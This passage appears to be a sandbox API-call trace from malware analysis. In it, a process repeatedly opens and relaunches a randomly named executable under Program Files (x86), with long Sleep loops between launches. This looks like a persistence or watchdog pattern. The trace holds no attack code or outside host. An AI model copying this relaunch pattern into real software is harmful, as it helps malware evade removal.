CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x122bfd40*=0x1978, IoStatusBlock=0x122bfd50*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0193.049] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x122bfcc0 | out: HeapArray=0x122bfcc0*=0x570000) returned 0x5 [0193.050] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x4c65200) returned 1 [0193.050] NtQueryInformationFile (in: FileHandle=0x1978, IoStatusBlock=0x122bfd50, FileInformation=0x122bfd60, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x122bfd50, FileInformation=0x122bfd60) returned 0x0 [0193.050] NtClose (Handle=0x1978) returned 0x0 [0193.050] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtPathName=0x122bfda0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0193.050] NtCreateFile (in: FileHandle=0x122bfd40, DesiredAccess=0x120089, ObjectAttributes=0x122bfdb0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x122bfd50, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x0, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x122bfd40*=0x1978, IoStatusBlock=0x122bfd50*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0193.050] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x122bfcc0 | out: HeapArray=0x122bfcc0*=0x570000) returned 0x5 [0193.050] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x4c65480) returned 1 [0193.050] NtClose (Handle=0x1978) returned 0x0 [0193.055] CreateProcessInternalW (in: hUserToken=0x0, lpApplicationName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", lpCommandLine=0x0, lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x122bfea0*(cb=0x68, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x122bfe80, hNewToken=0x0 | out: lpProcessInformation=0x122bfe80*(hProcess=0x1a20, hThread=0x1978, dwProcessId=0xf44, dwThreadId=0xe84), hNewToken=0x0) returned 1 [0193.071] Sleep (dwMilliseconds=0x1388) [0193.073] Sleep (dwMilliseconds=0x1388) [0193.074] Sleep (dwMilliseconds=0x1388) [0193.076] Sleep (dwMilliseconds=0x1388) [0193.077] Sleep (dwMilliseconds=0x1388) [0193.079] Sleep (dwMilliseconds=0x1388) [0193.080] Sleep (dwMilliseconds=0x1388) [0193.082] Sleep (dwMilliseconds=0x1388) [0193.086] Sleep (dwMilliseconds=0x1388) [0193.087] Sleep (dwMilliseconds=0x1388) [0193.089] Sleep (dwMilliseconds=0x1388) [0193.090] Sleep (dwMilliseconds=0x1388) [0193.092] Sleep (dwMilliseconds=0x1388) [0193.094] Sleep (dwMilliseconds=0x1388) [0193.096] Sleep (dwMilliseconds=0x1388) [0193.097] Sleep (dwMilliseconds=0x1388) [0193.106] Sleep (dwMilliseconds=0x1388) [0193.107] Sleep (dwMilliseconds=0x1388) [0193.132] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtPathName=0x122bfda0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0193.132] NtCreateFile (in: FileHandle=0x122bfd40, DesiredAccess=0x120089, ObjectAttributes=0x122bfdb0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x122bfd50, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x122bfd40*=0x19cc, IoStatusBlock=0x122bfd50*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0193.132] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x122bfcc0 | out: HeapArray=0x122bfcc0*=0x570000) returned 0x5 [0193.132] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x4c66100) returned 1 [0193.132] NtQueryInformationFile (in: FileHandle=0x19cc, IoStatusBlock=0x122bfd50, FileInformation=0x122bfd60, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x122bfd50, FileInformation=0x122bfd60) returned 0x0 [0193.132] NtClose (Handle=0x19cc) returned 0x0 [0193.132] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtPathName=0x122bfda0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0193.132] NtCreateFile (in: FileHandle=0x122bfd40, DesiredAccess=0x120089, ObjectAttributes=0x122bfdb0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x122bfd50, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x0, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x122bfd40*=0x19cc, IoStatusBlock=0x122bfd50*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0193.132] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x122bfcc0 | out: HeapArray=0x122bfcc0*=0x570000) returned 0x5 [0193.132] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x4c65480) returned 1 [0193.133] NtClose (Handle=0x19cc) returned 0x0 [0193.134] CreateProcessInternalW (in: hUserToken=0x0, lpApplicationName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", lpCommandLine=0x0, lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x122bfea0*(cb=0x68, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x122bfe80, hNewToken=0x0 | out: lpProcessInformation=0x122bfe80*(hProcess=0x1a1c, hThread=0x19cc, dwProcessId=0x3ec, dwThreadId=0x6f8), hNewToken=0x0) returned 1 [0194.298] Sleep (dwMilliseconds=0x1388) [0194.300] Sleep (dwMilliseconds=0x1388) [0194.324] Sleep (dwMilliseconds=0x1388) [0194.326] Sleep (dwMilliseconds=0x1388) [0194.328] Sleep (dwMilliseconds=0x1388) [0194.330] Sleep (dwMilliseconds=0x1388) [0194.331] Sleep (dwMilliseconds=0x1388) [0194.336] Sleep (dwMilliseconds=0x1388) [0194.337] Sleep (dwMilliseconds=0x1388) [0194.339] Sleep (dwMilliseconds=0x1388) [0194.340] Sleep (dwMilliseconds=0x1388) [0194.342] Sleep (dwMilliseconds=0x1388) [0194.343] Sleep (dwMilliseconds=0x1388) [0194.345] Sleep (dwMilliseconds=0x1388) [0194.347] Sleep (dwMilliseconds=0x1388) [0194.348] Sleep (dwMilliseconds=0x1388) [0194.353] Sleep (dwMilliseconds=0x1388) [0194.354] Sleep (dwMilliseconds=0x1388) [0194.356] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtPathName=0x122bfda0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0194.356] NtCreateFile (in: FileHandle=0x122bfd40, DesiredAccess=0x120089, ObjectAttributes=0x122bfdb0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x122bfd50, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x122bfd40*=0x1c80, IoStatusBlock=0x122bfd50*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0194.356] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x122bfcc0 | out: HeapArray=0x122bfcc0*=0x570000) returned 0x5 [0194.356] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x4c65c80) returned 1 [0194.356] NtQueryInformationFile (in: FileHandle=0x1c80, IoStatusBlock=0x122bfd50, FileInformation=0x122bfd60, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x122bfd50, FileInformation=0x122bfd60) returned 0x0 [0194.357] NtClose (Handle=0x1c80) returned 0x0 [0194.357] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtPathName=0x122bfda0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0194.357] NtCreateFile (in: FileHandle=0x122bfd40, DesiredAccess=0x120089, ObjectAttributes=0x122bfdb0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x122bfd50, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x0, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x122bfd40*=0x1c80, IoStatusBlock=0x122bfd50*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0194.357] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x122bfcc0 | out: HeapArray=0x122bfcc0*=0x570000) returned 0x5 [0194.357] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x4c64180) returned 1 [0194.357] NtClose (Handle=0x1c80) returned 0x0 [0194.360] CreateProcessInternalW (in: hUserToken=0x0, lpApplicationName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", lpCommandLine=0x0, lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x122bfea0*(cb=0x68, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x122bfe80, hNewToken=0x0 | out: lpProcessInformation=0x122bfe80*(hProcess=0x11ac, hThread=0x1c80, dwProcessId=0x12b4, dwThreadId=0xed8), hNewToken=0x0) returned 1 [0194.377] Sleep (dwMilliseconds=0x1388) [0194.378] Sleep (dwMilliseconds=0x1388) [0194.380] Sleep (dwMilliseconds=0x1388) [0194.384] Sleep (dwMilliseconds=0x1388) [0194.385] Sleep (dwMilliseconds=0x1388) [0194.387] Sleep (dwMilliseconds=0x1388) [0194.388] Sleep (dwMilliseconds=0x1388) [0194.389] Sleep (dwMilliseconds=0x1388) [0194.391] Sleep (dwMilliseconds=0x1388) [0194.393] Sleep (dwMilliseconds=0x1388) [0194.394] Sleep (dwMilliseconds=0x1388) [0194.396] Sleep (dwMilliseconds=0x1388) [0194.401] Sleep (dwMilliseconds=0x1388) [0194.402] Sleep (dwMilliseconds=0x1388) [0194.403] Sleep (dwMilliseconds=0x1388) [0194.405] Sleep (dwMilliseconds=0x1388) [0194.406] Sleep (dwMilliseconds=0x1388) [0194.408] Sleep (dwMilliseconds=0x1388) [0194.409] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtPathName=0x122bfda0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0194.410] NtCreateFile (in: FileHandle=0x122bfd40, DesiredAccess=0x120089, ObjectAttributes=0x122bfdb0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x122bfd50, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x122bfd40*=0x1cd4, IoStatusBlock=0x122bfd50*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0194.410] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x122bfcc0 | out: HeapArray=0x122bfcc0*=0x570000) returned 0x5 [0194.410] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x4c64700) returned 1 [0194.410] NtQueryInformationFile (in: FileHandle=0x1cd4, IoStatusBlock=0x122bfd50, FileInformation=0x122bfd60, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x122bfd50, FileInformation=0x122bfd60) returned 0x0 [0194.410] NtClose (Handle=0x1cd4) returned 0x0 [0194.410] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtPathName=0x122bfda0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0194.410] NtCreateFile (in: FileHandle=0x122bfd40, DesiredAccess=0x120089, ObjectAttributes=0x122bfdb0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x122bfd50, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x0, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x122bfd40*=0x1cd4, IoStatusBlock=0x122bfd50*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0194.410] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x122bfcc0 | out: HeapArray=0x122bfcc0*=0x570000) returned 0x5 [0194.410] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x4c65800) returned 1 [0194.410] NtClose (Handle=0x1cd4) returned 0x0 [0194.417] CreateProcessInternalW (in: hUserToken=0x0, lpApplicationName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", lpCommandLine=0x0, lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x122bfea0*(cb=0x68, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x122bfe80, hNewToken=0x0 | out: lpProcessInformation=0x122bfe80*(hProcess=0x2d8, hThread=0x1cd4, dwProcessId=0x117c, dwThreadId=0x1184), hNewToken=0x0) returned 1 [0194.434] Sleep (dwMilliseconds=0x1388) [0194.436] Sleep (dwMilliseconds=0x1388) [0194.438] Sleep (dwMilliseconds=0x1388) [0194.440] Sleep (dwMilliseconds=0x1388) [0194.441] Sleep (dwMilliseconds=0x1388) [0194.443] Sleep (dwMilliseconds=0x1388) [0194.449] Sleep (dwMilliseconds=0x1388) [0194.450] Sleep (dwMilliseconds=0x1388) [0194.452] Sleep (dwMilliseconds=0x1388) [0194.453] Sleep (dwMilliseconds=0x1388) [0194.455] Sleep (dwMilliseconds=0x1388) [0194.456] Sleep (dwMilliseconds=0x1388) [0194.457] Sleep (dwMilliseconds=0x1388) [0194.459] Sleep (dwMilliseconds=0x1388) [0194.461] Sleep (dwMilliseconds=0x1388) [0194.464] Sleep (dwMilliseconds=0x1388) [0194.466] Sleep (dwMilliseconds=0x1388) [0194.467] Sleep (dwMilliseconds=0x1388) [0194.469] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtPathName=0x122bfda0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0194.469] NtCreateFile (in: FileHandle=0x122bfd40, DesiredAccess=0x120089, ObjectAttributes=0x122bfdb0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x122bfd50, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x122bfd40*=0x1a18, IoStatusBlock=0x122bfd50*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0194.469] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x122bfcc0 | out: HeapArray=0x122bfcc0*=0x570000) returned 0x5 [0194.469] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x4c66100) returned 1 [0194.469] NtQueryInformationFile (in: FileHandle=0x1a18, IoStatusBlock=0x122bfd50, FileInformation=0x122bfd60, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x122bfd50, FileInformation=0x122bfd60) returned 0x0 [0194.469] NtClose (Handle=0x1a18) returned 0x0 [0194.469] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtPathName=0x122bfda0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0194.470] NtCreateFile (in: FileHandle=0x122bfd40, DesiredAccess=0x120089, ObjectAttributes=0x122bfdb0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x122bfd50, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x0, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x122bfd40*=0x1a18, IoStatusBlock=0x122bfd50*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0194.470] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x122bfcc0 | out: HeapArray=0x122bfcc0*=0x570000) returned 0x5 [0194.470] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x4c65f80) returned 1 [0194.470] NtClose (Handle=0x1a18) returned 0x0 [0194.473] CreateProcessInternalW (in: hUserToken=0x0, lpApplicationName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", lpCommandLine=0x0, lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x122bfea0*(cb=0x68, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x122bfe80, hNewToken=0x0 | out: lpProcessInformation=0x122bfe80*(hProcess=0x1a64, hThread=0x1a18, dwProcessId=0x1190, dwThreadId=0x1194), hNewToken=0x0) returned 1 [0194.611] Sleep (dwMilliseconds=0x1388) [0194.613] Sleep (dwMilliseconds=0x1388) [0194.615] Sleep (dwMilliseconds=0x1388) [0194.621] Sleep (dwMilliseconds=0x1388) [0194.623] Sleep (dwMilliseconds=0x1388) [0194.627] Sleep (dwMilliseconds=0x1388) [0194.630] Sleep (dwMilliseconds=0x1388) [0194.631] Sleep (dwMilliseconds=0x1388) [0194.633] Sleep (dwMilliseconds=0x1388) [0194.635] Sleep (dwMilliseconds=0x1388) [0194.638] Sleep (dwMilliseconds=0x1388) [0194.639] Sleep (dwMilliseconds=0x1388) [0194.644] Sleep (dwMilliseconds=0x1388) [0194.645] Sleep (dwMilliseconds=0x1388) [0194.647] Sleep (dwMilliseconds=0x1388) [0194.648] Sleep (dwMilliseconds=0x1388) [0194.650] Sleep (dwMilliseconds=0x1388) [0194.651] Sleep (dwMilliseconds=0x1388) [0194.653] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtPathName=0x122bfda0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0194.653] NtCreateFile (in: FileHandle=0x122bfd40, DesiredAccess=0x120089, ObjectAttributes=0x122bfdb0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x122bfd50, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x122bfd40*=0x19ac, IoStatusBlock=0x122bfd50*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0194.653] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x122bfcc0 | out: HeapArray=0x122bfcc0*=0x570000) returned 0x5 [0194.653] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x4c64400) returned 1 [0194.653] NtQueryInformationFile (in: FileHandle=0x19ac, IoStatusBlock=0x122bfd50, FileInformation=0x122bfd60, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x122bfd50, FileInformation=0x122bfd60) returned 0x0 [0194.653] NtClose (Handle=0x19ac) returned 0x0 [0194.653] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtPathName=0x122bfda0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0194.653] NtCreateFile (in: FileHandle=0x122bfd40, DesiredAccess=0x120089, ObjectAttributes=0x122bfdb0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x122bfd50, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x0, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x122bfd40*=0x19ac, IoStatusBlock=0x122bfd50*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0194.653] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x122bfcc0 | out: HeapArray=0x122bfcc0*=0x570000) returned 0x5 [0194.653] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x4c64c00) returned 1 [0194.653] NtClose (Handle=0x19ac) returned 0x0 [0194.662] CreateProcessInternalW (in: hUserToken=0x0, lpApplicationName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", lpCommandLine=0x0, lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x122bfea0*(cb=0x68, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x122bfe80, hNewToken=0x0 | out: lpProcessInformation=0x122bfe80*(hProcess=0x1d10, hThread=0x19ac, dwProcessId=0x1198, dwThreadId=0x11a0), hNewToken=0x0) returned 1 [0194.677] Sleep (dwMilliseconds=0x1388) [0194.678] Sleep (dwMilliseconds=0x1388) [0194.680] Sleep (dwMilliseconds=0x1388) [0194.681] Sleep (dwMilliseconds=0x1388) [0194.683] Sleep (dwMilliseconds=0x1388) [0194.684] Sleep (dwMilliseconds=0x1388) [0194.686] Sleep (dwMilliseconds=0x1388) [0194.698] Sleep (dwMilliseconds=0x1388) [0194.699] Sleep (dwMilliseconds=0x1388) [0194.702] Sleep (dwMilliseconds=0x1388) [0194.708] Sleep (dwMilliseconds=0x1388) [0194.710] Sleep (dwMilliseconds=0x1388) [0194.711] Sleep (dwMilliseconds=0x1388) [0194.714] Sleep (dwMilliseconds=0x1388) [0194.715] Sleep (dwMilliseconds=0x1388) [0194.717] Sleep (dwMilliseconds=0x1388) [0194.718] Sleep (dwMilliseconds=0x1388) [0194.719] Sleep (dwMilliseconds=0x1388) [0194.724] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtPathName=0x122bfda0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0194.724] NtCreateFile (in: FileHandle=0x122bfd40, DesiredAccess=0x120089, ObjectAttributes=0x122bfdb0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x122bfd50, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x122bfd40*=0x1d20, IoStatusBlock=0x122bfd50*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0194.724] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x122bfcc0 | out: HeapArray=0x122bfcc0*=0x570000) returned 0x5 [0194.724] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x4c64400) returned 1 [0194.724] NtQueryInformationFile (in: FileHandle=0x1d20, IoStatusBlock=0x122bfd50, FileInformation=0x122bfd60, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x122bfd50, FileInformation=0x122bfd60) returned 0x0 [0194.724] NtClose (Handle=0x1d20) returned 0x0 [0194.724] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtPathName=0x122bfda0, 